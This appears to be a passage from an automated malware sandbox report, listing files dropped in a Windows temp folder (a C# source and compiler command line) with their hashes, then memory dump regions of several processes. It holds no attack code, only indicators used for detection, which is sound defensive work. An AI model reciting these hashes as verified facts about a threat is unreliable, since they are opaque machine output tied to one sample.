                                                                                        e59f8ea461b91c0fcc9584111392dc609f75dd9ae5be423103e1b1e13b17fe13

                                                                                        SHA512

                                                                                        74e126f39b832e4fa43cbd1b7da1b86c72673a4f16028313aabf8088c91cd516376febda288d32b9b2918c0a84384a172dc3d43c0c02c0d129a6f84cc33f553d

                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\jcptgfcr\jcptgfcr.0.cs

                                                                                        Filesize

                                                                                        1004B

                                                                                        MD5

                                                                                        c76055a0388b713a1eabe16130684dc3

                                                                                        SHA1

                                                                                        ee11e84cf41d8a43340f7102e17660072906c402

                                                                                        SHA256

                                                                                        8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                        SHA512

                                                                                        22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\jcptgfcr\jcptgfcr.cmdline

                                                                                        Filesize

                                                                                        607B

                                                                                        MD5

                                                                                        ce5470334b103a0acbc917469d2d1c9c

                                                                                        SHA1

                                                                                        f6338854772c2a1b275a468e240f7dcda14d84db

                                                                                        SHA256

                                                                                        a5825c04fc78e53f14c6967050785ac856aec27560ee5c68dae8e5334834aa53

                                                                                        SHA512

                                                                                        7ec705a2b39da38ca6563a947d8d70070327d2911299f02bdff31508c379d40e186464e9a84a35b1c0fad2ef8324d9d753947c44c319889f261427d9e48e68b5

                                                                                      • memory/916-29-0x0000000000AB0000-0x0000000000B48000-memory.dmp

                                                                                        Filesize

                                                                                        608KB

                                                                                      • memory/916-28-0x0000000074DEE000-0x0000000074DEF000-memory.dmp

                                                                                        Filesize

                                                                                        4KB

                                                                                      • memory/1404-158-0x000000001D3F0000-0x000000001D51A000-memory.dmp

                                                                                        Filesize

                                                                                        1.2MB

                                                                                      • memory/1404-299-0x0000000024520000-0x00000000248CC000-memory.dmp

                                                                                        Filesize

                                                                                        3.7MB

                                                                                      • memory/1404-483-0x000000002D090000-0x000000002D142000-memory.dmp

                                                                                        Filesize

                                                                                        712KB

                                                                                      • memory/1404-479-0x000000002B560000-0x000000002B5C0000-memory.dmp

                                                                                        Filesize

                                                                                        384KB

                                                                                      • memory/1404-445-0x000000002B140000-0x000000002B2E4000-memory.dmp

                                                                                        Filesize

                                                                                        1.6MB

                                                                                      • memory/1404-443-0x0000000029890000-0x0000000029978000-memory.dmp

                                                                                        Filesize

                                                                                        928KB

                                                                                      • memory/1404-142-0x000000001D3F0000-0x000000001D51A000-memory.dmp

                                                                                        Filesize

                                                                                        1.2MB

                                                                                      • memory/1404-444-0x0000000029980000-0x0000000029A74000-memory.dmp

                                                                                        Filesize

                                                                                        976KB

                                                                                      • memory/1404-62-0x00007FFB3CBD0000-0x00007FFB3D692000-memory.dmp

                                                                                        Filesize

                                                                                        10.8MB

                                                                                      • memory/1404-63-0x000000001AD20000-0x000000001AEC0000-memory.dmp

                                                                                        Filesize

                                                                                        1.6MB

                                                                                      • memory/1404-65-0x000000001AD20000-0x000000001AEC0000-memory.dmp

                                                                                        Filesize

                                                                                        1.6MB

                                                                                      • memory/1404-417-0x0000000029BD0000-0x0000000029C3A000-memory.dmp

                                                                                        Filesize

                                                                                        424KB

                                                                                      • memory/1404-64-0x000000001AD20000-0x000000001AEC0000-memory.dmp

                                                                                        Filesize

                                                                                        1.6MB

                                                                                      • memory/1404-380-0x0000000026DD0000-0x0000000026E7A000-memory.dmp

                                                                                        Filesize

                                                                                        680KB

                                                                                      • memory/1404-341-0x0000000022400000-0x0000000022468000-memory.dmp

                                                                                        Filesize

                                                                                        416KB

                                                                                      • memory/1404-104-0x0000000180000000-0x0000000180005000-memory.dmp

                                                                                        Filesize

                                                                                        20KB

                                                                                      • memory/1404-157-0x000000001D3F0000-0x000000001D51A000-memory.dmp

                                                                                        Filesize

                                                                                        1.2MB

                                                                                      • memory/1404-127-0x000000001D230000-0x000000001D23A000-memory.dmp

                                                                                        Filesize

                                                                                        40KB

                                                                                      • memory/1404-125-0x000000001D230000-0x000000001D23A000-memory.dmp

                                                                                        Filesize

                                                                                        40KB

                                                                                      • memory/1404-123-0x000000001D230000-0x000000001D23A000-memory.dmp

                                                                                        Filesize

                                                                                        40KB

                                                                                      • memory/1404-122-0x000000001D230000-0x000000001D23A000-memory.dmp

                                                                                        Filesize

                                                                                        40KB

                                                                                      • memory/1404-108-0x000000001D130000-0x000000001D25A000-memory.dmp

                                                                                        Filesize

                                                                                        1.2MB

                                                                                      • memory/1404-102-0x0000000180000000-0x0000000180005000-memory.dmp

                                                                                        Filesize

                                                                                        20KB

                                                                                      • memory/1404-100-0x0000000180000000-0x0000000180005000-memory.dmp

                                                                                        Filesize

                                                                                        20KB

                                                                                      • memory/1404-98-0x0000000180000000-0x0000000180005000-memory.dmp

                                                                                        Filesize

                                                                                        20KB

                                                                                      • memory/1404-97-0x0000000180000000-0x0000000180005000-memory.dmp

                                                                                        Filesize

                                                                                        20KB

                                                                                      • memory/1404-160-0x000000001F240000-0x000000001F262000-memory.dmp

                                                                                        Filesize

                                                                                        136KB

                                                                                      • memory/1404-109-0x000000001D130000-0x000000001D25A000-memory.dmp

                                                                                        Filesize

                                                                                        1.2MB

                                                                                      • memory/1404-161-0x000000001F240000-0x000000001F25C000-memory.dmp

                                                                                        Filesize

                                                                                        112KB

                                                                                      • memory/1404-162-0x000000001F240000-0x000000001F25C000-memory.dmp

                                                                                        Filesize

                                                                                        112KB

                                                                                      • memory/1404-159-0x000000001D3F0000-0x000000001D51A000-memory.dmp

                                                                                        Filesize

                                                                                        1.2MB

                                                                                      • memory/1404-113-0x000000001D130000-0x000000001D25A000-memory.dmp

                                                                                        Filesize

                                                                                        1.2MB

                                                                                      • memory/1404-144-0x000000001D3F0000-0x000000001D51A000-memory.dmp

                                                                                        Filesize

                                                                                        1.2MB

                                                                                      • memory/1404-121-0x000000001D3F0000-0x000000001D51A000-memory.dmp

                                                                                        Filesize

                                                                                        1.2MB

                                                                                      • memory/1404-315-0x00000000221E0000-0x00000000223F4000-memory.dmp

                                                                                        Filesize

                                                                                        2.1MB

                                                                                      • memory/1404-143-0x000000001D3F0000-0x000000001D51A000-memory.dmp

                                                                                        Filesize

                                                                                        1.2MB

                                                                                      • memory/1404-136-0x00007FFB4BB40000-0x00007FFB4BC8F000-memory.dmp

                                                                                        Filesize

                                                                                        1.3MB

                                                                                      • memory/1404-215-0x000000001FDE0000-0x000000002116C000-memory.dmp

                                                                                        Filesize

                                                                                        19.5MB

                                                                                      • memory/1404-216-0x0000000021170000-0x00000000216BE000-memory.dmp

                                                                                        Filesize

                                                                                        5.3MB

                                                                                      • memory/1404-217-0x000000001F720000-0x000000001F818000-memory.dmp

                                                                                        Filesize

                                                                                        992KB

                                                                                      • memory/1404-218-0x000000001F820000-0x000000001F918000-memory.dmp

                                                                                        Filesize

                                                                                        992KB

                                                                                      • memory/1404-140-0x000000001D240000-0x000000001D24A000-memory.dmp

                                                                                        Filesize

                                                                                        40KB

                                                                                      • memory/1404-231-0x0000000022850000-0x0000000022A0E000-memory.dmp

                                                                                        Filesize

                                                                                        1.7MB

                                                                                      • memory/1404-232-0x0000000022A30000-0x00000000230DC000-memory.dmp

                                                                                        Filesize

                                                                                        6.7MB

                                                                                      • memory/1404-139-0x000000001D240000-0x000000001D24A000-memory.dmp

                                                                                        Filesize

                                                                                        40KB

                                                                                      • memory/1404-234-0x00000000230E0000-0x00000000238BA000-memory.dmp

                                                                                        Filesize

                                                                                        7.9MB

                                                                                      • memory/1404-138-0x000000001D240000-0x000000001D24A000-memory.dmp

                                                                                        Filesize

                                                                                        40KB

                                                                                      • memory/1404-135-0x000000001D240000-0x000000001D24A000-memory.dmp

                                                                                        Filesize

                                                                                        40KB

                                                                                      • memory/1404-309-0x00000000248D0000-0x0000000024D38000-memory.dmp

                                                                                        Filesize

                                                                                        4.4MB

                                                                                      • memory/1404-310-0x0000000022150000-0x00000000221C2000-memory.dmp

                                                                                        Filesize

                                                                                        456KB

                                                                                      • memory/1404-311-0x00000000221C0000-0x00000000221E0000-memory.dmp

                                                                                        Filesize

                                                                                        128KB

                                                                                      • memory/2784-183-0x00007FFB4EEB0000-0x00007FFB4EED4000-memory.dmp

                                                                                        Filesize

                                                                                        144KB

                                                                                      • memory/2784-172-0x00007FFB4EB10000-0x00007FFB4EB29000-memory.dmp

                                                                                        Filesize

                                                                                        100KB

                                                                                      • memory/2784-187-0x00007FFB4DE70000-0x00007FFB4DE85000-memory.dmp

                                                                                        Filesize

                                                                                        84KB

                                                                                      • memory/2784-59-0x00007FFB4E040000-0x00007FFB4E4A6000-memory.dmp

                                                                                        Filesize

                                                                                        4.4MB

                                                                                      • memory/2784-156-0x00007FFB39720000-0x00007FFB3989A000-memory.dmp

                                                                                        Filesize

                                                                                        1.5MB

                                                                                      • memory/2784-182-0x0000022A09C00000-0x0000022A09F79000-memory.dmp

                                                                                        Filesize

                                                                                        3.5MB

                                                                                      • memory/2784-190-0x00007FFB385D0000-0x00007FFB386E8000-memory.dmp

                                                                                        Filesize

                                                                                        1.1MB

                                                                                      • memory/2784-150-0x00007FFB4DFA0000-0x00007FFB4DFCC000-memory.dmp

                                                                                        Filesize

                                                                                        176KB

                                                                                      • memory/2784-96-0x00007FFB51E60000-0x00007FFB51E6F000-memory.dmp

                                                                                        Filesize

                                                                                        60KB

                                                                                      • memory/2784-332-0x00007FFB4DE90000-0x00007FFB4DEBE000-memory.dmp

                                                                                        Filesize

                                                                                        184KB

                                                                                      • memory/2784-78-0x00007FFB4EEB0000-0x00007FFB4EED4000-memory.dmp

                                                                                        Filesize

                                                                                        144KB

                                                                                      • memory/2784-174-0x00007FFB51BD0000-0x00007FFB51BDD000-memory.dmp

                                                                                        Filesize

                                                                                        52KB

                                                                                      • memory/2784-233-0x00007FFB4EB10000-0x00007FFB4EB29000-memory.dmp

                                                                                        Filesize

                                                                                        100KB

                                                                                      • memory/2784-343-0x0000022A09C00000-0x0000022A09F79000-memory.dmp

                                                                                        Filesize

                                                                                        3.5MB

                                                                                      • memory/2784-344-0x00007FFB386F0000-0x00007FFB38A69000-memory.dmp

                                                                                        Filesize

                                                                                        3.5MB

                                                                                      • memory/2784-154-0x00007FFB4F0D0000-0x00007FFB4F0EF000-memory.dmp

                                                                                        Filesize

                                                                                        124KB

                                                                                      • memory/2784-176-0x00007FFB4DE90000-0x00007FFB4DEBE000-memory.dmp

                                                                                        Filesize

                                                                                        184KB

                                                                                      • memory/2784-152-0x00007FFB51CD0000-0x00007FFB51CE8000-memory.dmp

                                                                                        Filesize

                                                                                        96KB

                                                                                      • memory/2784-180-0x00007FFB4E040000-0x00007FFB4E4A6000-memory.dmp

                                                                                        Filesize

                                                                                        4.4MB

                                                                                      • memory/2784-181-0x00007FFB4B880000-0x00007FFB4B938000-memory.dmp

                                                                                        Filesize

                                                                                        736KB

                                                                                      • memory/2784-342-0x00007FFB4B880000-0x00007FFB4B938000-memory.dmp

                                                                                        Filesize

                                                                                        736KB

                                                                                      • memory/2784-219-0x00007FFB39720000-0x00007FFB3989A000-memory.dmp

                                                                                        Filesize

                                                                                        1.5MB

                                                                                      • memory/2784-208-0x00007FFB4F0D0000-0x00007FFB4F0EF000-memory.dmp

                                                                                        Filesize

                                                                                        124KB

                                                                                      • memory/2784-188-0x00007FFB4EE20000-0x00007FFB4EE2D000-memory.dmp

                                                                                        Filesize

                                                                                        52KB

                                                                                      • memory/2784-466-0x00007FFB4F0D0000-0x00007FFB4F0EF000-memory.dmp

                                                                                        Filesize

                                                                                        124KB

                                                                                      • memory/2784-461-0x00007FFB4EEB0000-0x00007FFB4EED4000-memory.dmp

                                                                                        Filesize

                                                                                        144KB

                                                                                      • memory/2784-471-0x00007FFB4B880000-0x00007FFB4B938000-memory.dmp

                                                                                        Filesize

                                                                                        736KB

                                                                                      • memory/2784-470-0x00007FFB4DE90000-0x00007FFB4DEBE000-memory.dmp

                                                                                        Filesize

                                                                                        184KB

                                                                                      • memory/2784-469-0x00007FFB51BD0000-0x00007FFB51BDD000-memory.dmp

                                                                                        Filesize

                                                                                        52KB

                                                                                      • memory/2784-468-0x00007FFB4EB10000-0x00007FFB4EB29000-memory.dmp

                                                                                        Filesize

                                                                                        100KB

                                                                                      • memory/2784-467-0x00007FFB39720000-0x00007FFB3989A000-memory.dmp

                                                                                        Filesize

                                                                                        1.5MB

                                                                                      • memory/2784-465-0x00007FFB51CD0000-0x00007FFB51CE8000-memory.dmp

                                                                                        Filesize

                                                                                        96KB

                                                                                      • memory/2784-464-0x00007FFB4DFA0000-0x00007FFB4DFCC000-memory.dmp

                                                                                        Filesize

                                                                                        176KB

                                                                                      • memory/2784-463-0x00007FFB51E60000-0x00007FFB51E6F000-memory.dmp

                                                                                        Filesize

                                                                                        60KB

                                                                                      • memory/2784-462-0x00007FFB386F0000-0x00007FFB38A69000-memory.dmp

                                                                                        Filesize

                                                                                        3.5MB

                                                                                      • memory/2784-475-0x00007FFB385D0000-0x00007FFB386E8000-memory.dmp

                                                                                        Filesize

                                                                                        1.1MB

                                                                                      • memory/2784-474-0x00007FFB4EE20000-0x00007FFB4EE2D000-memory.dmp

                                                                                        Filesize

                                                                                        52KB

                                                                                      • memory/2784-473-0x00007FFB4DE70000-0x00007FFB4DE85000-memory.dmp

                                                                                        Filesize

                                                                                        84KB

                                                                                      • memory/2784-472-0x00007FFB4E040000-0x00007FFB4E4A6000-memory.dmp

                                                                                        Filesize

                                                                                        4.4MB

                                                                                      • memory/2784-184-0x00007FFB386F0000-0x00007FFB38A69000-memory.dmp

                                                                                        Filesize

                                                                                        3.5MB

                                                                                      • memory/3492-199-0x0000024058940000-0x0000024058962000-memory.dmp

                                                                                        Filesize

                                                                                        136KB

                                                                                      • memory/4576-326-0x00000259B3790000-0x00000259B3798000-memory.dmp

                                                                                        Filesize

                                                                                        32KB